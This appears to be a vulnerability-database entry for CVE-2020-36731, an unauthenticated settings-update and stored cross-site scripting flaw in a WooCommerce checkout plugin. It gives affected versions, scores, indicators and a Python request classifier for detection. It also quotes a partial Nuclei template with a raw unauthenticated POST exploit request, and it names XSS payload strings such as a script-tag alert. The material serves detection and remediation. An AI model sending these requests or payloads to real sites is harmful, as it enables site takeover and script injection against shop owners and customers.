CVE-2020-36731
Published: 2023-06-07
CVE-2020-36731: The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored…
Priority P179 · medium · 6.1 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:R / S:C / C:L / I:L / A:N
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 1.34% (67.8th percentile)
The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to missing authorization checks on the updateSettingsAction() function which is called via an admin_init hook, along with missing sanitization and escaping on the settings that are stored.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wpdesk | flexible_checkout_fields | <= 2.3.1 | — |
| wpdesk | flexible_checkout_fields_for_woocommerce_woocommerce_checkout_manager | < 2.3.2 | 2.3.2 |
Detection & IOCs (extracted from sources)
- url: /wp-admin/admin.php?page=inspire_checkout_fields_settings&tab=fields_order
- command: option_page=inspire_checkout_fields_settings&action=update&inspire_checkout_fields%5Bsettings%5D%5Border%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bname%5D=order_comments
- other: inspire_checkout_fields[settings][order]

- Unauthenticated POST to /wp-admin/admin.php with page=inspire_checkout_fields_settings and action=update abuses the missing authorization check on updateSettingsAction() hooked via admin_init; no authentication is required to modify plugin settings.
- Successful exploitation returns the string 'Settings resetted.' in the HTTP response body; use this as a confirmation matcher for the unauthenticated settings-update attack.
- Stored XSS payload is injected into the inspire_checkout_fields[settings][order] parameter using unsanitized field names containing <script>alert(2)</script>; monitor POST bodies to the settings endpoint for script tags in parameter names.
- Detection rule matches on co-occurrence of 'order_alert(document.domain)', '[custom_field]', and 'inspire_checkout_fields[settings][order]' in the response, indicating successful stored XSS injection.
- Content-Type of the malicious POST is application/x-www-form-urlencoded; alert on unauthenticated (no valid WordPress auth cookies) POST requests to wp-admin/admin.php with this content type targeting inspire_checkout_fields_settings.
- The vulnerability affects Flexible Checkout Fields for WooCommerce plugin versions up to and including 2.3.1; ensure version scope is confirmed before applying detections to avoid false positives on patched installations.
- The attack vector is the admin_init hook, meaning the POST does not require a logged-in session; WAF rules blocking unauthenticated wp-admin access may mitigate this but should be validated against the specific hook behavior.
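
The request-side checks in the list above, as an added example (not code from the plugin, the Nuclei template or any vendor rule): a classifier over parsed HTTP request records. The record layout, function name and finding labels are assumptions; the cookie test only checks that a `wordpress_logged_in_` cookie is present, not that it is valid, and markup is looked for in values as well as parameter names, which goes slightly beyond what the page describes.

```python
import re
from urllib.parse import urlsplit, parse_qsl

SETTINGS_PAGE = "inspire_checkout_fields_settings"   # from the page's IOC list
PARAM_PREFIX = "inspire_checkout_fields[settings]"   # from the page's IOC list
AUTH_COOKIE = "wordpress_logged_in_"  # WordPress login cookie prefix; presence only, not validity
MARKUP = re.compile(r"<\s*/?\s*[a-z]", re.I)         # any opening or closing tag

def classify(req):
    """Return the set of findings for one request record (hypothetical dict layout)."""
    findings = set()
    parts = urlsplit(req["url"])
    headers = {k.lower(): v for k, v in req["headers"].items()}
    if req["method"].upper() != "POST" or not parts.path.endswith("/wp-admin/admin.php"):
        return findings
    if dict(parse_qsl(parts.query)).get("page") != SETTINGS_PAGE:
        return findings
    if not headers.get("content-type", "").lower().startswith("application/x-www-form-urlencoded"):
        return findings
    fields = parse_qsl(req["body"], keep_blank_values=True)  # percent-decodes names and values
    if ("action", "update") in fields and AUTH_COOKIE not in headers.get("cookie", ""):
        findings.add("unauthenticated-settings-update")
    if any(n.startswith(PARAM_PREFIX) and (MARKUP.search(n) or MARKUP.search(v)) for n, v in fields):
        findings.add("markup-in-settings-field")
    return findings

URL = "/wp-admin/admin.php?page=inspire_checkout_fields_settings&tab=fields_order"
FORM = {"Content-Type": "application/x-www-form-urlencoded"}
BASE = "option_page=inspire_checkout_fields_settings&action=update&"
PLAIN = BASE + "inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bname%5D=order_comments"
# Constructed sample records for exercising the classifier, not captured traffic.
SAMPLES = {
    "anon_markup": {"method": "POST", "url": URL, "headers": FORM,
        "body": BASE + "inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Bx_%3Cscript%3E%5D%5Bname%5D=x"},
    "anon_plain": {"method": "POST", "url": URL, "headers": FORM, "body": PLAIN},
    "admin_plain": {"method": "POST", "url": URL, "body": PLAIN,
        "headers": {**FORM, "Cookie": "wordpress_logged_in_constructed=placeholder"}},
    "anon_get": {"method": "GET", "url": URL, "headers": {}, "body": ""},
}

if __name__ == "__main__":
    for name, req in SAMPLES.items():
        print(name, sorted(classify(req)))
```

Confirm the installed plugin version before acting on a hit, since the same request against 2.3.2 or later is not evidence of a settings change.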
CVSS provenance
nvd · v3.1 · 6.1 MEDIUM · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vulncheck · 7.2 HIGH
GHSA
GHSA-x5rc-5886-54gw: The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to St
ghsa_unreviewed·2023-06-07
CVE-2020-36731 [MEDIUM] CWE-79 GHSA-x5rc-5886-54gw: The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to St
VulnCheck
wpdesk flexible_checkout_fields Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2020·CVSS 7.2
CVE-2020-36731 [HIGH] wpdesk flexible_checkout_fields Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Affected: wpdesk flexible_checkout_fields
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/blog/2020/02
No detection rules found.
Nuclei
Flexible Checkout Fields for WooCommerce <= 2.3.1 - Unauthenticated Arbitrary Plugin Settings Update
nuclei·CVSS 6.1
CVE-2020-36731 [MEDIUM] Flexible Checkout Fields for WooCommerce <= 2.3.1 - Unauthenticated Arbitrary Plugin Settings Update
Flexible Checkout Fields for WooCommerce alert(document.domain)_%5D%5Bcustom_field%5D=1
```yaml
matchers:
  - type: word
    words:
      - "order_alert(document.domain)"
      - "[custom_field]"
      - "inspire_checkout_fields[settings][order]"
    condition: and
    internal: true

- raw:
    - |
      POST /wp-admin/admin.php?page=inspire_checkout_fields_settings&tab=fields_order HTTP/1.1
      Host: {{Hostname}}
      Content-Type: application/x-www-form-urlencoded

      option_page=inspire_checkout_fields_settings&action=update&inspire_checkout_fields%5Bsettings%5D%5Border%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bname%5D=order_comments&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bvisible%5D=1&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bvisible%5D=0&inspire_checko
```
No writeups or analysis indexed.
- https://blog.nintechnet.com/zero-day-vulnerability-fixed-in-wordpress-flexible-checkout-fields-for-woocommerce-plugin/
- https://www.wordfence.com/blog/2020/02/site-takeover-campaign-exploits-multiple-zero-day-vulnerabilities/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/fd12a952-2e99-41f7-b74c-55c2b7d8deed?source=cve
Published: 2023-06-07
Exploited in the wild